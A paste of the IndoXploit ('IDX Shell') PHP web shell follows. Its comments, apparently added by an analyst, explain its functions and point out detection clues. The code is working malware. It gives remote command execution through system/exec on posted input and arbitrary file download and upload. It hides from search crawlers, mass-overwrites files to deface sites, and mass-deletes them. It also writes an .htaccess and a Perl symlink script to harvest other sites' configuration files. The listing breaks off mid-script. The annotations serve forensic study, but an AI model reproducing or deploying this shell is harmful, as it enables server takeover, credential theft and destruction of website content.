0xCor3

IDX Shell Recoded

Feb 15th, 2017
  1. <?php
  // Analyst note: this listing is a PHP web shell (its own pages are titled "IndoXploit Shell" / "IDX Shell").
  // The opening statements start a session, then turn off error reporting, the PHP error log,
  // error display and the execution time limit, so failures in the script leave no PHP-side log trail.
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  // NOTE(review): set_magic_quotes_runtime() was removed in PHP 7.0, which suggests the sample
  // targets PHP 5-era runtimes; useful when triaging whether a found copy could have run on a host.
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  // $auth_pass is a 32-hex-digit value that line 65 compares against md5($_POST['pass']),
  // i.e. an unsalted MD5 digest of the operator password hard-coded in the file.
  // $color, $default_action, $default_use_ajax and $default_charset are not referenced in the
  // visible part of the listing. NOTE(review): 'FilesMan' is a string commonly associated with the
  // WSO web-shell family, so it is presumably inherited boilerplate that generic signatures may match.
  13. $auth_pass = "0030eca98157a85f562c212c0651c415";
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  // Crawler cloaking: any request whose User-Agent matches one of the names below (case-insensitive)
  // gets a bare "404 Not Found" and the script stops. For responders this means a 404 seen by an
  // automated scanner or search-engine cache does not show the file is absent; confirm on disk.
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  // login_shell(): emits the password prompt page and terminates the request.
  // The page is titled "Access Denied!" and contains a single POST form with one password
  // field named "pass"; the form has no action attribute, so it posts back to the same URL.
  // The function never returns: it calls exit after the markup.
  // Analyst note: the page pulls a stylesheet from fonts.googleapis.com and an image from
  // rs894.pbsrc.com, so a browser opening it makes those outbound requests.
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>Access Denied!</title>
  31. <style type="text/css">
  32. @import url('https://fonts.googleapis.com/css?family=Comfortaa|Lobster+Two|PT+Sans');
  33. html {
  34. margin: 20px auto;
  35. background: #000000;
  36. color: green;
  37. text-align: center;
  38. }
  39. header {
  40. color: green;
  41. margin: 10px auto;
  42. }
  43. input[type=password] {
  44. width: 250px;
  45. height: 25px;
  46. color: lime;
  47. background: #800000;
  48. border: 1px solid transparent;
  49. padding: 5px;
  50. margin-left: 20px;
  51. text-align: center;
  52. }
  53. </style>
  54. </head>
  55. <center>
  56. <br><br><br><br><br><br><br><br><br><br><h1><img src="http://rs894.pbsrc.com/albums/ac144/tifarez/Indonesia.png~c200" border="0" height="50" width="50"><font color="red" face="Lobster Two">IndoXploit Shell</font></h1><br>
  57. <form method="post">
  58. <input type="password" name="pass">
  59. </form>
  60. </center>
  61. <?php
  62. exit;
  63. }
  // Access gate. The "logged in" flag is a session entry keyed by md5() of the Host header.
  // The two ifs are unbraced, so the else belongs to the inner if: when the flag is missing,
  // access is granted if $auth_pass is empty (no password at all) or if md5($_POST['pass'])
  // loosely equals $auth_pass; otherwise login_shell() prints the prompt and exits.
  64. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  65. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  66. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  67. else
  68. login_shell();
  // File download handler: with act=download, the path in the "file" query parameter is
  // streamed back as an attachment via readfile(). The path is used as given, so any file
  // readable by the PHP process can be retrieved. $_GET['act'] is read without isset().
  // Analyst note: access-log entries carrying both "act=download" and "file=" on this script
  // are a direct record of which files were pulled.
  69. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  70. @ob_clean();
  71. $file = $_GET['file'];
  72. header('Content-Description: File Transfer');
  73. header('Content-Type: application/octet-stream');
  74. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  75. header('Expires: 0');
  76. header('Cache-Control: must-revalidate');
  77. header('Pragma: public');
  78. header('Content-Length: ' . filesize($file));
  79. readfile($file);
  80. exit;
  81. }
  82. ?>
  83. <html>
  84. <head>
  85. <link rel="shortcut icon" type="image/x-icon" href="http://rs894.pbsrc.com/albums/ac144/tifarez/Indonesia.png~c200" />
  86. <title>IDX Shell</title>
  87. <meta name='author' content='IDX Shell'>
  88. <link href="https://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet">
  89. <link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet">
  90.  
  91. <meta charset="UTF-8">
  92. <style type='text/css'>
  93. @import url('https://fonts.googleapis.com/css?family=Comfortaa|Lobster+Two|PT+Sans');
  94. html {
  95. background: #000000;
  96. color: red;
  97. font-family: 'Kelly Slab';
  98. font-size: 13px;
  99. width: 100%;
  100. }
  101. li {
  102. display: inline;
  103. margin: 5px;
  104. padding: 5px;
  105. }
  106. table, th, td {
  107. border-collapse:collapse;
  108. font-family: Tahoma, Geneva, sans-serif;
  109. background: transparent;
  110. font-family: 'Share Tech Mono';
  111. font-size: 13px;
  112. }
  113. .table_home, .th_home, .td_home {
  114. border: 1px dotted transparent;
  115. }
  116. th {
  117. padding: 10px;
  118. }
  119. a {
  120. color: yellow;
  121. text-decoration: none;
  122. }
  123. a:hover {
  124. color: yellow;
  125. text-decoration: none;
  126. text-shadow:0px 0px 3px #ffffff
  127. }
  128. b {
  129. color: gold;
  130. }
  131. input[type=text], input[type=password],input[type=submit] {
  132. background: #800000;
  133. color: #ffffff;
  134. border: 1px solid #ffffff;
  135. margin: 5px auto;
  136. padding-left: 5px;
  137. font-family: 'PT sans';
  138. font-size: 13px;
  139. }
  140. textarea {
  141. border: 1px dotted transparent;
  142. width: 100%;
  143. height: 400px;
  144. padding-left: 5px;
  145. margin: 15px auto;
  146. resize: none;
  147. background: #800000;
  148. color: #ffffff;
  149. font-family: 'PT sans';
  150. font-size: 13px;
  151. }
  152. select {
  153. width: 152px;
  154. background: #000000;
  155. color: lime;
  156. border: 1px dotted #000000;
  157. margin: 5px auto;
  158. padding-left: 5px;
  159. font-family: 'PT sans';
  160. font-size: 13px;
  161. }
  162. option:hover {
  163. background: lime;
  164. color: #000000;
  165. }
  166. tr:hover{
  167. background-color: #800000;
  168. text-shadow:0px 0px 20px #ffffff;
  169. }
  170. </style>
  171. </head>
  172. <body>
  173. <h1><center><img src="http://rs894.pbsrc.com/albums/ac144/tifarez/Indonesia.png~c200" border="0" height="50" width="50"><font color="red" face="Lobster Two">IndoXploit Shell</font></h1></center><h3><center><font color="white" face="PT sans">Indonesia Goes To International!</font></center></h3>
  174. </body>
  175. <?php
  /**
   * Wrap $perm in a <font> tag whose colour reflects whether $dir is writable:
   * lime when is_writable($dir) is true, red otherwise.
   */
  function w($dir,$perm) {
      $openTag = is_writable($dir) ? "<font color=lime>" : "<font color=red>";
      return $openTag.$perm."</font>";
  }
  /**
   * Wrap $perm in a <font> tag whose colour reflects whether $dir is readable:
   * lime when is_readable($dir) is true, red otherwise.
   */
  function r($dir,$perm) {
      $openTag = is_readable($dir) ? "<font color=lime>" : "<font color=red>";
      return $openTag.$perm."</font>";
  }
  // exe($cmd): runs $cmd as an operating-system command through the first of system(), exec(),
  // passthru(), shell_exec() for which function_exists() is true, and returns the captured output.
  //  - system()/passthru() output is collected with output buffering;
  //  - the exec() branch joins the output lines with no separator;
  //  - if none of the four functions is available the function falls off the end and returns nothing.
  // Analyst note: callers in this listing hand it request data directly (line 440 passes
  // $_POST['cmd']), so it is command execution as the web-server account. function_exists()
  // reports false for functions named in php.ini disable_functions, so a host that disables all
  // four leaves this helper without effect. Child processes of the PHP/web-server process are
  // the main host-side trace of its use.
  190. function exe($cmd) {
  191. if(function_exists('system')) {
  192. @ob_start();
  193. @system($cmd);
  194. $buff = @ob_get_contents();
  195. @ob_end_clean();
  196. return $buff;
  197. } elseif(function_exists('exec')) {
  198. @exec($cmd,$results);
  199. $buff = "";
  200. foreach($results as $result) {
  201. $buff .= $result;
  202. } return $buff;
  203. } elseif(function_exists('passthru')) {
  204. @ob_start();
  205. @passthru($cmd);
  206. $buff = @ob_get_contents();
  207. @ob_end_clean();
  208. return $buff;
  209. } elseif(function_exists('shell_exec')) {
  210. $buff = @shell_exec($cmd);
  211. return $buff;
  212. }
  213. }
  /**
   * Render the mode of $file as a ten-character "ls -l" style string
   * (type letter followed by owner, group and world rwx triads).
   * The mode comes from fileperms($file).
   */
  function perms($file){
      $mode = fileperms($file);

      // File-type masks, tested in this order; the first full match wins, 'u' means unknown.
      $typeLetters = array(
          0xC000 => 's', // socket
          0xA000 => 'l', // symbolic link
          0x8000 => '-', // regular file
          0x6000 => 'b', // block special
          0x4000 => 'd', // directory
          0x2000 => 'c', // character special
          0x1000 => 'p', // FIFO pipe
      );
      $text = 'u';
      foreach ($typeLetters as $mask => $letter) {
          if (($mode & $mask) == $mask) {
              $text = $letter;
              break;
          }
      }

      // read bit, write bit, execute bit, special bit, letter with execute, letter without execute
      $triads = array(
          array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner (setuid)
          array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group (setgid)
          array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world (sticky)
      );
      foreach ($triads as $triad) {
          list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $triad;
          $text .= ($mode & $readBit) ? 'r' : '-';
          $text .= ($mode & $writeBit) ? 'w' : '-';
          if ($mode & $execBit) {
              $text .= ($mode & $specialBit) ? $withExec : 'x';
          } else {
              $text .= ($mode & $specialBit) ? $withoutExec : '-';
          }
      }
      return $text;
  }
  /**
   * Format a byte count as a short string: two decimals plus " GB", " MB" or " KB"
   * for values of at least 1024^3, 1024^2 or 1024, otherwise the raw value plus " B".
   */
  function hdd($s) {
      // Largest unit first so the first threshold reached decides the suffix.
      $units = array(
          1073741824 => ' GB',
          1048576    => ' MB',
          1024       => ' KB',
      );
      foreach ($units as $divisor => $suffix) {
          if ($s >= $divisor) {
              return sprintf('%1.2f', $s / $divisor).$suffix;
          }
      }
      return $s.' B';
  }
  /**
   * Return the part of $param that lies between the first occurrence of $kata1
   * and the next occurrence of $kata2 after it ("ambil kata" is Indonesian for "take word").
   * Returns FALSE when either marker does not occur anywhere in $param.
   */
  function ambilKata($param, $kata1, $kata2){
      $firstMarker = strpos($param, $kata1);
      if ($firstMarker === FALSE || strpos($param, $kata2) === FALSE) {
          return FALSE;
      }
      $from = $firstMarker + strlen($kata1);
      $to = strpos($param, $kata2, $from);
      return substr($param, $from, $to - $from);
  }
  // getsource($url): fetches $url with cURL and returns the response body
  // (or whatever curl_exec() returns on failure).
  // Redirects are followed, and TLS certificate and host-name verification are both
  // switched off, so the fetched content is not authenticated in any way.
  // Analyst note: this makes the web server itself originate outbound HTTP(S) requests;
  // egress filtering and proxy logs for the PHP process are where that shows up.
  279. function getsource($url) {
  280. $curl = curl_init($url);
  281. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  282. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  283. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  284. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  285. $content = curl_exec($curl);
  286. curl_close($curl);
  287. return $content;
  288. }
  // bing($dork): pages through Bing search results for the query $dork via getsource(),
  // advancing the "first" offset by 10 per request (upper bound 30000) and stopping when a
  // fetch fails or the page has no link to the next offset. Result links are pulled out with
  // a regular expression, reduced to their host part ($exp[2] of the URL split on "/"),
  // de-duplicated, and echoed one per line. Nothing is returned.
  // $lll, $sss and $linksuiv are assigned but never read.
  // Analyst note: a compromised host running this produces bursts of requests from the web
  // server to www.bing.com/search, which is unusual traffic for most server workloads.
  289. function bing($dork) {
  290. $npage = 1;
  291. $npages = 30000;
  292. $allLinks = array();
  293. $lll = array();
  294. while($npage <= $npages) {
  295. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  296. if($x) {
  297. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  298. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  299. $npage = $npage + 10;
  300. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  301. } else break;
  302. }
  303. $URLs = array();
  304. foreach($allLinks as $url){
  305. $exp = explode("/", $url);
  306. $URLs[] = $exp[2];
  307. }
  308. $array = array_filter($URLs);
  309. $array = array_unique($array);
  310. $sss = count(array_unique($array));
  311. foreach($array as $domain) {
  312. echo $domain."\n";
  313. }
  314. }
  // reverse($url): POSTs "remoteAddress=$url&ket=" over plain HTTP to the hard-coded
  // third-party endpoint below, strips JSON punctuation from the reply with a chain of
  // str_replace() calls, splits the remainder on ",,", discards the first element and echoes
  // every other element prefixed with "http://", flushing output after each line.
  // Presumably a reverse-IP lookup (domains sharing an address), judging by the endpoint
  // and the function name; the response format is not visible here.
  // Analyst note: outbound POSTs from a web server to domains.yougetsignal.com are a
  // network-level indicator for this tool.
  315. function reverse($url) {
  316. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  317. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  318. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  319. curl_setopt($ch, CURLOPT_HEADER, 0);
  320. curl_setopt($ch, CURLOPT_POST, 1);
  321. $resp = curl_exec($ch);
  322. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  323. $array = explode(",,", $resp);
  324. unset($array[0]);
  325. foreach($array as $lnk) {
  326. $lnk = "http://$lnk";
  327. $lnk = str_replace(",", "", $lnk);
  328. echo $lnk."\n";
  329. ob_flush();
  330. flush();
  331. }
  332. curl_close($ch);
  333. }
  // When magic quotes are active, define idx_ss() (recursive stripslashes over nested
  // arrays) and use it to undo the automatic escaping of $_POST and $_COOKIE. $_GET is left as is.
  // NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0, another sign the sample was
  // written for older PHP runtimes.
  334. if(get_magic_quotes_gpc()) {
  335. function idx_ss($array) {
  336. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  337. }
  338. $_POST = idx_ss($_POST);
  339. $_COOKIE = idx_ss($_COOKIE);
  340. }
  341.  
  // Working directory: the "dir" query parameter, when present, is passed to chdir()
  // unchanged, so every relative path used later follows the operator's chosen directory.
  342. if(isset($_GET['dir'])) {
  343. $dir = $_GET['dir'];
  344. chdir($dir);
  345. } else {
  346. $dir = getcwd();
  347. }
  // Host reconnaissance shown in the banner: kernel/uname string, resolved server address,
  // disk usage, PHP restrictions and which helper tools are present.
  348. $kernel = php_uname();
  349. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  350. $dir = str_replace("\\","/",$dir);
  351. $scdir = explode("/", $dir);
  352. $freespace = hdd(disk_free_space("/"));
  353. $total = hdd(disk_total_space("/"));
  // $total and $freespace are already formatted strings from hdd(), so this subtraction
  // works on text rather than byte counts and the "used" figure is unreliable.
  354. $used = $total - $freespace;
  // Status labels are Indonesian: NYALA = on, MATI = off.
  355. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>NYALA</font>" : "<font color=lime>MATI</font>";
  356. $ds = @ini_get("disable_functions");
  357. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  358. $curl = (function_exists('curl_version')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  // Analyst note: the next three lines run "wget --help", "perl --help" and "python --help"
  // through exe() on every page load that reaches this point. Those three child processes
  // spawned together by the web-server/PHP process are a useful process-telemetry pattern.
  359. $wget = (exe('wget --help')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  360. $perl = (exe('perl --help')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  361. $python = (exe('python --help')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
  362. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  // Identity of the PHP process: POSIX lookups when available, otherwise the script
  // owner's user name and ids with the group shown as "?".
  363. if(!function_exists('posix_getegid')) {
  364. $user = @get_current_user();
  365. $uid = @getmyuid();
  366. $gid = @getmygid();
  367. $group = "?";
  368. } else {
  369. $uid = @posix_getpwuid(posix_geteuid());
  370. $gid = @posix_getgrgid(posix_getegid());
  371. $user = $uid['name'];
  372. $uid = $uid['uid'];
  373. $group = $gid['name'];
  374. $gid = $gid['gid'];
  375. }
  // Banner: prints the values collected above (system string, user/group, server and client
  // address, disk figures, safe mode, disabled functions, tool availability).
  376. echo "<font color=yellow>[System:</font> <font color=lime>".$kernel."]</font><br>";
  377. echo "<font color=yellow>[User:</font> <font color=lime>".$user."]</font> (".$uid.") [Group: <font color=lime>".$group."]</font> (".$gid.")<br>";
  378. echo "<font color=yellow>[Server IP:</font> <font color=lime>".$ip."]</font> | [Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."]</font><br>";
  379. echo "<font color=yellow>[HDD:</font> <font color=lime>$used</font> / <font color=lime>$total]</font> ( [Free: <font color=lime>$freespace]</font> )<br>";
  380. echo "<font color=yellow>[Safe Mode:</font> $sm]<br>";
  381. echo "<font color=yellow>[Disable Functions:</font> $show_ds]<br>";
  382. echo "<font color=yellow>[MySQL:</font> $mysql] | <font color=yellow>[Perl:</font> $perl] | <font color=yellow>[Python:</font> $python] | <font color=yellow>[WGET:</font> $wget] | <font color=yellow>[CURL:</font> $curl] <br>";
  // "Kamu Berada Di Directory Ini" is Indonesian for "you are in this directory".
  // The loop renders the current path as breadcrumbs: each path component links to
  // ?dir=<path up to and including that component>.
  383. echo "<font color=yellow>[Kamu Berada Di Directory Ini = </font>";
  384. foreach($scdir as $c_dir => $cdir) {
  385. echo "<a href='?dir=";
  386. for($i = 0; $i <= $c_dir; $i++) {
  387. echo $scdir[$i];
  388. if($i != $c_dir) {
  389. echo "/";
  390. }
  391. }
  392. echo "'>$cdir</a>/";
  393. }
  // Shows the current directory's mode string, coloured by whether it is writable.
  394. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  // Upload form and handler. The form posts a file field named "file" and a submit
  // button named "_upl" back to the same URL.
  395. echo '
  396. <form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
  397. <input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  // The uploaded temp file is copied to the client-supplied file name, relative to the current
  // working directory (which follows the "dir" parameter), with no check on name or type.
  // "Upload Sukses" / "Gagal Upload" are Indonesian for upload succeeded / upload failed.
  // Analyst note: multipart POSTs to this script followed by new files appearing in the same
  // directory tree are how additional tooling is typically staged through a shell like this.
  398. if( $_POST['_upl'] == "Upload" ) {
  399. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
  400. else { echo '<b>Gagal Upload!!!</b><br><br>'; }
  401. }
  // Feature menu. Every entry is a link of the form ?dir=<current dir>&do=<feature>, and the
  // if/elseif chain that follows dispatches on $_GET['do'].
  // Analyst note: the "do" values below (sym404, cmd, mass_deface, mass_delete, config, jumping,
  // cpanel, smtp, zoneh, csrf, cgi, network, hash_en, adminer, fake_root, auto_edit_user, auto_wp,
  // auto_dwp, auto_dwp2, cpftp_auto, krdp_shell) double as access-log search terms: they show
  // which features were invoked against a host and in what order.
  402. echo "<hr>";
  403. echo "<center>";
  404. echo "<ul>";
  405. echo "<li>[ <a href='?'>Home</a> ]</li>";
  406. echo "<li>[ <a href='?dir=$dir&do=sym404'>Sym404 Bypass</a> ]</li>";
  407. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  409. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  411. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  412. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  413. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  414. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H Mirror</a> ]</li>";
  415. echo "<li>[ <a href='?dir=$dir&do=csrf'>CSRF Uploader</a> ]</li>";
  416. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  417. echo "<li>[ <a href='?dir=$dir&do=network'>Network</a> ]</li>";
  418. echo "<li>[ <a href='?dir=$dir&do=hash_en'>MD5 Encrypter</a> ]</li>";
  419. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
  420. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  421. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  422. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  423. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  424. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  425. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  426. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  427. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
  428. echo "</ul>";
  429. echo "</center>";
  430. echo "<hr>";
  431. if($_GET['logout'] == true) {
  432. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  433. echo "<script>window.location='?';</script>";
  434. } elseif($_GET['do'] == 'cmd') {
  435. echo "<form method='post'>
  436. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  437. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  438. </form>";
  439. if($_POST['do_cmd']) {
  440. echo "<pre>".exe($_POST['cmd'])."</pre>";
  441. }
  442. } elseif($_GET['do'] == 'mass_deface') {
  // sabun_massal($dir, $namafile, $isi_script): recursive overwrite ("massal" = mass;
  // $namafile = file name, $isi_script = file content, $lokasi = target path).
  // If $dir is writable, every scandir() entry is visited:
  //  - for "." and ".." the content is written to "$dir/./$namafile" and "$dir/../$namafile",
  //    so the parent of the chosen directory receives a copy as well;
  //  - for each writable subdirectory the file is written, the path is echoed with a DONE
  //    marker, and the function recurses into that subdirectory.
  // Existing files with that name are replaced. Nothing is returned.
  // Analyst note (incident scoping): check the whole tree below the affected directory and
  // each visited directory's parent for files of the same name with identical content and
  // near-identical modification times; restore from backup rather than editing in place.
  443. function sabun_massal($dir,$namafile,$isi_script) {
  444. if(is_writable($dir)) {
  445. $dira = scandir($dir);
  446. foreach($dira as $dirb) {
  447. $dirc = "$dir/$dirb";
  448. $lokasi = $dirc.'/'.$namafile;
  449. if($dirb === '.') {
  450. file_put_contents($lokasi, $isi_script);
  451. } elseif($dirb === '..') {
  452. file_put_contents($lokasi, $isi_script);
  453. } else {
  454. if(is_dir($dirc)) {
  455. if(is_writable($dirc)) {
  456. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  457. file_put_contents($lokasi, $isi_script);
  458. $idx = sabun_massal($dirc,$namafile,$isi_script);
  459. }
  460. }
  461. }
  462. }
  463. }
  464. }
  // sabun_biasa($dir, $namafile, $isi_script): single-level variant of the overwrite routine
  // ("biasa" = ordinary). If $dir is writable it writes $isi_script to "$dir/./$namafile",
  // to "$dir/../$namafile" (the parent directory) and into each writable immediate
  // subdirectory, echoing a DONE line per subdirectory. It does not recurse and returns nothing.
  // Analyst note (incident scoping): affected locations are the chosen directory, its parent
  // and its direct children only.
  465. function sabun_biasa($dir,$namafile,$isi_script) {
  466. if(is_writable($dir)) {
  467. $dira = scandir($dir);
  468. foreach($dira as $dirb) {
  469. $dirc = "$dir/$dirb";
  470. $lokasi = $dirc.'/'.$namafile;
  471. if($dirb === '.') {
  472. file_put_contents($lokasi, $isi_script);
  473. } elseif($dirb === '..') {
  474. file_put_contents($lokasi, $isi_script);
  475. } else {
  476. if(is_dir($dirc)) {
  477. if(is_writable($dirc)) {
  478. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  479. file_put_contents($lokasi, $isi_script);
  480. }
  481. }
  482. }
  483. }
  484. }
  485. }
  486. if($_POST['start']) {
  487. if($_POST['tipe_sabun'] == 'mahal') {
  488. echo "<div style='margin: 5px auto; padding: 5px'>";
  489. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  490. echo "</div>";
  491. } elseif($_POST['tipe_sabun'] == 'murah') {
  492. echo "<div style='margin: 5px auto; padding: 5px'>";
  493. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  494. echo "</div>";
  495. }
  496. } else {
  497. echo "<center>";
  498. echo "<form method='post'>
  499. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  500. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  501. <font style='text-decoration: underline;'>Folder:</font><br>
  502. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  503. <font style='text-decoration: underline;'>Filename:</font><br>
  504. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  505. <font style='text-decoration: underline;'>Index File:</font><br>
  506. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  507. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  508. </form></center>";
  509. }
  510. } elseif($_GET['do'] == 'mass_delete') {
  // hapus_massal($dir, $namafile): recursive delete by file name ("hapus" = delete).
  // If $dir is writable, every scandir() entry is visited:
  //  - for "." it removes "$dir/$namafile" when present;
  //  - for ".." it removes dirname($dir)."/$namafile" when present (the parent directory);
  //  - for each writable subdirectory that contains the file, it echoes a DELETED line,
  //    removes the file and recurses. Subdirectories without the file are not descended into.
  // Nothing is returned.
  // Analyst note (incident scoping): deletions are not logged anywhere by this code beyond the
  // HTML response, so file-integrity monitoring or backups are needed to establish what was removed.
  511. function hapus_massal($dir,$namafile) {
  512. if(is_writable($dir)) {
  513. $dira = scandir($dir);
  514. foreach($dira as $dirb) {
  515. $dirc = "$dir/$dirb";
  516. $lokasi = $dirc.'/'.$namafile;
  517. if($dirb === '.') {
  518. if(file_exists("$dir/$namafile")) {
  519. unlink("$dir/$namafile");
  520. }
  521. } elseif($dirb === '..') {
  522. if(file_exists("".dirname($dir)."/$namafile")) {
  523. unlink("".dirname($dir)."/$namafile");
  524. }
  525. } else {
  526. if(is_dir($dirc)) {
  527. if(is_writable($dirc)) {
  528. if(file_exists($lokasi)) {
  529. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  530. unlink($lokasi);
  531. $idx = hapus_massal($dirc,$namafile);
  532. }
  533. }
  534. }
  535. }
  536. }
  537. }
  538. }
  539. if($_POST['start']) {
  540. echo "<div style='margin: 5px auto; padding: 5px'>";
  541. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  542. echo "</div>";
  543. } else {
  544. echo "<center>";
  545. echo "<form method='post'>
  546. <font style='text-decoration: underline;'>Folder:</font><br>
  547. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  548. <font style='text-decoration: underline;'>Filename:</font><br>
  549. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  550. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  551. </form></center>";
  552. }
  553. } elseif($_GET['do'] == 'config') {
  554. $idx = mkdir("idx_config", 0777);
  555. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  556. $htc = fopen("idx_config/.htaccess","w");
  557. fwrite($htc, $isi_htc);
  558. fclose($htc);
  559. if(preg_match("/vhosts|vhost/", $dir)) {
  560. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  561. $vhost = "#!/usr/bin/perl -I/usr/local/bandmin
opendir(my $dir , "/var/www/vhosts/");
foreach(sort readdir $dir) {
    my $isDir = 0;
    $isDir = 1 if -d $_;
$sitess = $_;


symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/configure.php',$sitess.'-shop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/os/includes/configure.php',$sitess.'-shop-os.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscom/includes/configure.php',$sitess.'-oscom.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerce/includes/configure.php',$sitess.'-oscommerce.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerces/includes/configure.php',$sitess.'-oscommerces.txt');
